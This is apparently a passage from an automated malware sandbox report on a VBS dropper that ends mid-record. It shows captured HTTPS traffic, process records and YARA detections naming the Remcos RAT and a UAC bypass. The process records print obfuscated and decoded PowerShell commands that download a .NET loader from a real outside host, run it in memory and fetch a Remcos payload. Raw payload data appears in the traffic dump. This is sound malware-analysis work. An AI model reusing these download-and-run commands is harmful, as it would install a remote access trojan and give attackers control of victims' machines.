                                  2024-09-26 08:55:37 UTC14994INData Raw: 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81
                                  Data Ascii:
                                  2024-09-26 08:55:37 UTC16384INData Raw: 5a 53 52 57 5a 77 6c 48 56 35 78 32 5a 75 39 6d 63 30 4e 6c 4c 7a 78 32 62 76 52 6c 4c 7a 56 32 59 79 56 33 62 7a 56 6d 55 75 30 57 5a 30 4e 58 65 54 4e 44 e3 81 82 e3 81 82 e3 81 82 42 45 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6a 4c 77 34 43 4d 75 45 54 4d 49 55 47 64 68 78 47 63 74 56 47 56 35 31 6b 43 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 47 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 43 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3
                                  Data Ascii: ZSRWZwlHV5x2Zu9mc0NlLzx2bvRlLzV2YyV3bzVmUu0WZ0NXeTNDBEEjLw4CMuETMIUGdhxGctVGV51kCEGQEC
                                  2024-09-26 08:55:37 UTC16384INData Raw: e3 81 82 e3 81 82 67 67 45 e3 81 82 e3 81 82 e3 81 82 4d e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6f e3 81 82 e3 81 82 e3 81 82 70 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6f e3 81 82 e3 81 82 e3 81 82 6e e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 73 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 45 77 35 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 73 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3
                                  Data Ascii: ggEMopIonEsQIEw5EsQI
                                  2024-09-26 08:55:38 UTC8089INData Raw: 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 77 51 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 4d 54 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 71 6f e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 4d 42 4b 43 34 68 4b 47 6f 67 42 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 51 44 6f e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 4c 57 45 77 4b 58 45 42 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 63 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 67 44 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 4d 54 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81
                                  Data Ascii: wQQMTqoMBKC4hKGogBQDoLWEwKXEBcgDEMT


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.44974615.235.85.1944437728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-26 08:55:38 UTC90OUTGET /wp-content/uploads/2024/07/remcos.txt HTTP/1.1
                                  Host: www.informacionoportuna.com
                                  2024-09-26 08:55:38 UTC212INHTTP/1.1 200 OK
                                  Connection: close
                                  content-type: text/plain
                                  last-modified: Tue, 02 Jul 2024 14:55:59 GMT
                                  accept-ranges: bytes
                                  content-length: 659456
                                  date: Thu, 26 Sep 2024 08:55:38 GMT
                                  server: LiteSpeed
                                  2024-09-26 08:55:38 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHAB
                                  2024-09-26 08:55:38 UTC16384INData Raw: 41 45 41 41 41 41 41 41 37 4d 2b 4f 46 76 44 6c 37 6b 78 4f 48 6f 44 2b 35 6f 58 4f 64 6c 44 55 35 45 55 4f 64 6b 7a 46 34 63 4f 4f 4d 6a 6a 72 34 51 4b 4f 64 68 54 51 34 63 7a 4e 4e 66 6a 76 33 6b 37 4e 30 65 7a 62 33 6f 32 4e 58 59 6a 31 32 38 72 4e 2b 5a 44 63 32 6f 57 4e 63 58 6a 61 31 55 57 4e 57 52 7a 31 30 73 4c 4e 56 53 44 6b 30 6f 77 4d 77 4e 54 56 7a 41 31 4d 35 4d 54 4b 79 34 75 4d 53 4c 54 7a 79 49 72 4d 67 4b 7a 6a 79 67 6f 4d 36 4a 54 63 79 59 6d 4d 63 4a 54 55 79 63 6b 4d 34 49 54 4a 78 51 66 4d 49 48 7a 76 78 6b 61 4d 49 47 44 64 78 55 56 4d 47 46 44 4c 78 51 41 4d 78 44 54 32 77 6f 4b 4d 6b 43 7a 4e 41 41 41 41 67 43 41 41 77 44 41 41 41 38 7a 2f 2f 41 2f 50 6d 2f 44 31 2f 77 38 50 34 2b 6a 6a 2f 6b 34 50 6e 39 44 58 2f 45 30 50 37 38 6a
                                  Data Ascii: AEAAAAAA7M+OFvDl7kxOHoD+5oXOdlDU5EUOdkzF4cOOMjjr4QKOdhTQ4czNNfjv3k7N0ezb3o2NXYj128rN+ZDc2oWNcXja1UWNWRz10sLNVSDk0owMwNTVzA1M5MTKy4uMSLTzyIrMgKzjygoM6JTcyYmMcJTUyckM4ITJxQfMIHzvxkaMIGDdxUVMGFDLxQAMxDT2woKMkCzNAAAAgCAAwDAAA8z//A/Pm/D1/w8P4+jj/k4Pn9DX/E0P78j
                                  2024-09-26 08:55:38 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 6e 58 65 61 2b 66 6b 52 61 38 2f 70 6d 36 32 2f 48 63 77 30 2f 2f 32 62 2f 2f 2f 33 66 2f 2f 2f 7a 4e 33 72 76 73 6b 53 65 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/nXea+fkRa8/pm62/Hcw0//2b///3f///zN3rvskSeMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  2024-09-26 08:55:38 UTC16384INData Raw: 41 55 6b 6c 45 44 41 51 41 52 47 64 7a 42 6b 62 76 6c 47 64 77 56 32 59 34 56 32 58 6b 46 6d 59 57 46 30 50 75 41 41 41 41 41 41 41 46 5a 4a 78 41 41 41 51 41 52 47 64 7a 42 45 51 41 52 58 5a 30 46 47 64 7a 4a 57 54 66 56 46 52 45 42 45 64 32 4e 57 5a 6b 39 32 59 6b 38 6a 56 42 39 6a 4c 41 41 41 41 41 41 51 52 57 53 4d 41 41 42 45 5a 30 4e 48 51 45 42 55 5a 77 6c 48 64 6a 52 79 50 57 46 30 50 75 41 41 41 41 41 41 41 46 5a 4a 78 41 41 41 41 41 41 45 51 6b 52 33 63 41 56 32 63 68 4a 32 58 6c 42 58 65 30 4e 57 56 42 39 6a 4c 41 41 41 41 41 41 51 52 57 53 4d 41 41 41 45 51 6b 52 33 63 41 56 32 63 68 4a 32 58 30 5a 33 59 6c 52 32 62 6a 5a 56 51 2f 34 43 41 41 41 41 41 41 55 6b 6c 45 44 41 41 41 41 45 51 6b 52 33 63 41 56 47 64 6c 78 57 5a 6b 39 31 64 6c 35 32
                                  Data Ascii: AUklEDAQARGdzBkbvlGdwV2Y4V2XkFmYWF0PuAAAAAAAFZJxAAAQARGdzBEQARXZ0FGdzJWTfVFREBEd2NWZk92Yk8jVB9jLAAAAAAQRWSMAABEZ0NHQEBUZwlHdjRyPWF0PuAAAAAAAFZJxAAAAAAEQkR3cAV2chJ2XlBXe0NWVB9jLAAAAAAQRWSMAAAEQkR3cAV2chJ2X0Z3YlR2bjZVQ/4CAAAAAAUklEDAAAAEQkR3cAVGdlxWZk91dl52
                                  2024-09-26 08:55:38 UTC16384INData Raw: 41 41 41 41 41 38 2f 2f 2f 37 50 41 41 41 41 41 2f 2f 2f 2f 6f 43 41 41 41 41 77 2f 2f 2f 76 2f 41 4d 55 6f 30 41 77 51 68 71 43 41 41 41 41 41 41 4d 55 6f 6c 42 41 41 41 41 77 2f 2f 2f 76 2f 41 41 41 41 41 38 2f 2f 2f 44 4e 41 41 41 41 41 2f 2f 2f 2f 2b 44 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 52 6c 54 4a 41 41 41 51 41 5a 4d 5a 42 69 41 51 52 2b 78 34 2f 2f 2f 2f 2f 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 55 35 6f 42 41 41 41 45 51 47 54 57 67 49 41 55 6b 66 76 2b 2f 2f 2f 2f 50 41 41 41 51 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 6b 78 6b 46 49 43 41 44 4a 6c
                                  Data Ascii: AAAAA8///7PAAAAA////oCAAAAw///v/AMUo0AwQhqCAAAAAAMUolBAAAAw///v/AAAAA8///DNAAAAA////+DAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAgRlTJAAAQAZMZBiAQR+x4/////AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAYU5oBAAAEQGTWgIAUkfv+////PAAAQBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkxkFICADJl
                                  2024-09-26 08:55:38 UTC16384INData Raw: 79 55 7a 51 44 4e 55 51 32 6b 54 4d 44 56 30 51 46 46 30 4e 33 45 45 4d 43 68 44 4e 79 49 45 52 77 45 55 4d 34 55 6a 52 45 52 6b 4d 33 4d 44 4e 47 46 44 4f 45 52 7a 4d 32 63 7a 51 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 55 52 42 4a 7a 51 46 4e 44 52 45 56 45 4f 44 56 44 4f 42 4a 44 52 35 45 44 52 46 4a 54 51 34 51 45 4f 35 4d 6a 4e 31 59 7a 51 42 56 7a 4e 34 4d 54 4d 77 55 6a 52 34 67 44 4d 30 45 7a 4d 77 49 54 4d 78 51 54 4d 34 55 6b 52 46 5a 7a 51 35 51 55
                                  Data Ascii: yUzQDNUQ2kTMDV0QFF0N3EEMChDNyIERwEUM4UjRERkM3MDNGFDOERzM2czQGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYURBJzQFNDREVEODVDOBJDR5EDRFJTQ4QEO5MjN1YzQBVzN4MTMwUjR4gDM0EzMwITMxQTM4UkRFZzQ5QU
                                  2024-09-26 08:55:38 UTC16384INData Raw: 5a 68 42 39 75 5a 43 65 4a 30 38 4f 37 75 33 32 63 4f 6d 62 6f 6a 52 66 6e 43 42 72 5a 75 44 79 6c 49 78 73 50 58 64 4c 70 2b 47 30 54 79 58 61 64 42 6f 76 66 4f 38 72 31 4c 59 4f 33 37 6c 4c 59 6a 4c 36 51 32 34 45 43 62 76 66 47 4a 47 56 66 78 38 6d 71 68 6e 6b 4e 41 6c 4f 64 53 4f 4c 74 2b 4c 70 2f 63 72 6a 6d 6f 74 65 65 6a 53 70 31 48 34 7a 6d 53 39 43 32 67 70 79 69 36 50 6a 34 45 64 77 5a 6e 6b 54 48 66 34 4d 51 2b 75 49 39 78 43 32 57 42 2f 50 61 41 4b 2f 4d 53 4d 71 70 54 6d 49 48 52 4a 53 36 48 42 63 35 6d 5a 71 7a 61 42 62 72 45 38 34 51 66 6e 68 53 78 65 44 79 43 7a 38 63 37 35 4c 4c 31 52 4b 68 32 32 78 35 4c 54 45 75 75 62 50 34 4c 74 53 6b 30 58 68 47 48 42 49 45 65 70 49 41 4e 78 59 46 43 68 51 78 77 74 79 58 54 65 38 6a 68 62 37 38 6a 6d
                                  Data Ascii: ZhB9uZCeJ08O7u32cOmbojRfnCBrZuDylIxsPXdLp+G0TyXadBovfO8r1LYO37lLYjL6Q24ECbvfGJGVfx8mqhnkNAlOdSOLt+Lp/crjmoteejSp1H4zmS9C2gpyi6Pj4EdwZnkTHf4MQ+uI9xC2WB/PaAK/MSMqpTmIHRJS6HBc5mZqzaBbrE84QfnhSxeDyCz8c75LL1RKh22x5LTEuubP4LtSk0XhGHBIEepIANxYFChQxwtyXTe8jhb78jm
                                  2024-09-26 08:55:38 UTC16384INData Raw: 39 6b 44 2f 34 78 51 6b 68 33 78 50 55 43 6e 72 65 62 4a 67 41 30 44 4f 72 6c 67 2f 37 44 54 42 2f 73 34 56 64 61 72 33 41 41 51 50 2b 55 41 4f 74 45 31 39 62 38 44 66 44 67 71 43 6b 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 6f 6c 65 73 39 72 4c 42 68 77 76 79 72 6e 38 63 66 58 73 31 41 6b 46 72 2b 70 66 59 6b 35 39 2f 77 76 61 43 77 74 6c 31 49 4e 77 6c 6b 4d 67 71 56 44 68 56 42 4d 43 54 6d 41 5a 70 45 59 50 41 56 54 69 55 59 38 6c 4f 6e 2f 66 77 44 41 41 41 41 41 41 42 38 48 38 41 41 41 41 41 41 51 41 2f 42 50 41 41 41 41 41 41 41 77 2f 77 44 41 41 41 41 41 41 41 4d 45 4d 41 41 41 41 41 41 41 41 44 42 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: 9kD/4xQkh3xPUCnrebJgA0DOrlg/7DTB/s4Vdar3AAQP+UAOtE19b8DfDgqCkDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/oles9rLBhwvyrn8cfXs1AkFr+pfYk59/wvaCwtl1INwlkMgqVDhVBMCTmAZpEYPAVTiUY8lOn/fwDAAAAAAB8H8AAAAAAQA/BPAAAAAAAw/wDAAAAAAAMEMAAAAAAAADBDAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  2024-09-26 08:55:38 UTC16384INData Raw: 39 47 69 61 45 42 4e 43 6c 32 7a 76 48 58 4e 49 6b 4b 43 41 41 30 4c 54 4a 71 4c 5a 79 72 56 56 2f 69 63 71 74 6d 41 53 67 43 51 76 41 78 78 59 6e 56 56 7a 43 38 62 79 39 56 6b 34 45 42 49 41 39 57 30 6c 75 42 6f 59 47 2f 78 76 4b 2f 55 37 61 74 4c 6f 41 30 72 53 62 6c 5a 36 66 6b 32 74 2f 75 73 4a 67 75 2f 67 67 44 51 76 6e 51 49 6b 4f 49 55 74 34 38 37 79 38 7a 56 48 62 42 4f 41 39 57 51 39 4e 54 75 6b 49 6e 7a 76 4d 50 4e 6d 6f 37 44 67 41 30 37 4b 6b 52 34 75 50 43 53 43 2f 32 4d 72 51 35 66 62 41 42 51 76 32 38 6d 70 7a 2f 50 2f 41 2f 72 7a 47 36 58 43 39 41 4d 41 39 32 54 46 32 42 53 78 53 46 38 76 50 2f 6c 71 2b 46 48 6f 41 30 4c 50 70 4a 48 79 54 55 65 51 2f 43 64 48 69 77 49 39 41 41 51 76 44 64 4d 4c 50 68 33 33 68 2b 4c 30 4d 69 46 6a 61 44 48
                                  Data Ascii: 9GiaEBNCl2zvHXNIkKCAA0LTJqLZyrVV/icqtmASgCQvAxxYnVVzC8by9Vk4EBIA9W0luBoYG/xvK/U7atLoA0rSblZ6fk2t/usJgu/ggDQvnQIkOIUt487y8zVHbBOA9WQ9NTukInzvMPNmo7DgA07KkR4uPCSC/2MrQ5fbABQv28mpz/P/A/rzG6XC9AMA92TF2BSxSF8vP/lq+FHoA0LPpJHyTUeQ/CdHiwI9AAQvDdMLPh33h+L0MiFjaDH
                                  2024-09-26 08:55:38 UTC16384INData Raw: 41 34 47 41 68 42 77 59 41 6b 47 41 79 42 51 5a 41 30 47 41 68 42 41 41 41 41 41 41 6f 42 77 63 41 6b 47 41 73 42 77 5a 41 34 47 41 6c 42 41 49 41 34 47 41 68 42 77 59 41 6b 47 41 79 42 51 5a 41 30 47 41 68 42 41 41 41 41 41 41 75 42 51 59 41 4d 47 41 70 42 67 63 41 55 47 41 74 42 51 59 41 55 45 75 45 41 51 52 34 43 4b 41 46 74 4c 70 41 55 45 75 55 2b 44 34 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 2f 34 44 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 2f 42 4f 41 41 41 41 41 41 41 77 2f 67 44 41 41 41 41 41 41 41 41 49 41 41 41 41 41 41 41 41 41 2f 44 50 41 41 41 41 41 41 41 77 66 77 44 41 41 41 41 41 41 41 38 48 38 41 41 41 41 41 41 51 41 2f 65 66 46 48 42 45 41 41 41 77 2f 2f 2f 2f 2f 34 44 41 41 41 38 6a 35 75 49 6b 2f 36 6e 7a
                                  Data Ascii: A4GAhBwYAkGAyBQZA0GAhBAAAAAAoBwcAkGAsBwZA4GAlBAIA4GAhBwYAkGAyBQZA0GAhBAAAAAAuBQYAMGApBgcAUGAtBQYAUEuEAQR4CKAFtLpAUEuU+D4AAAAAAAAAAAAAAAAAAw/4DAAAAAAAAAEAAAAAAAA/BOAAAAAAAw/gDAAAAAAAAIAAAAAAAAA/DPAAAAAAAwfwDAAAAAAA8H8AAAAAAQA/efFHBEAAAw/////4DAAA8j5uIk/6nz


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:04:55:04
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                                  Imagebase:0x7ff67be20000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:1
                                  Start time:04:55:05
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:2
                                  Start time:04:55:05
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:3
                                  Start time:04:55:06
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.2965204743.0000029B32A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_DLAgent09, Description: Detects known downloader agent, Source: 00000003.00000002.2965204743.0000029B32A20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:04:55:08
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
